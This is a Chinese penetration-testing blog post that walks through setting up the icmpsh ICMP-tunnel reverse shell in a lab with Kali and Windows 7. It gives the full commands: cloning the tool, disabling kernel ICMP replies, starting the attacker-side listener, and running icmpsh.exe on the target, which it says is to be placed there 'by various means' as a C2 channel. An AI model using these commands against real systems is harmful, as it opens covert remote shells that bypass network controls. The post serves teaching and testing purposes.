【渗透测试】ICMP隧道技术之icmpsh使用

【渗透测试】ICMP隧道技术之icmpsh使用

一、使用场景

icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方

二、icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。
icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

三、环境

kali:10.43.32.28/24

win7:10.43.32.30/24
同一个网段

1、下载工具:(git或者zip)

git clone https://github.com/inquisb/icmpsh.git

在这里插入图片描述

2、安装需要的python库文件

pip2 install impacket 

在这里插入图片描述

3、关闭本机的icmp应答,防止内核对自己的ping包响应

sysctl -w net.ipv4.icmp_echo_ignore_all=1

后面实验结束之后在自行调整过来即可

sysctl -w net.ipv4.icmp_echo_ignore_all=0

在这里插入图片描述

python2 icmpsh_m.py 10.43.32.28  10.43.32.30 
[攻击机ip][目标机ip]

4、目标机执行命令(这里需要各种手段把icmpsh.exe放到目标机上)

icmpsh.exe -t 10.43.32.28
[攻击机ip]

在这里插入图片描述

攻击机上成功反弹shell

在这里插入图片描述

参考:
https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值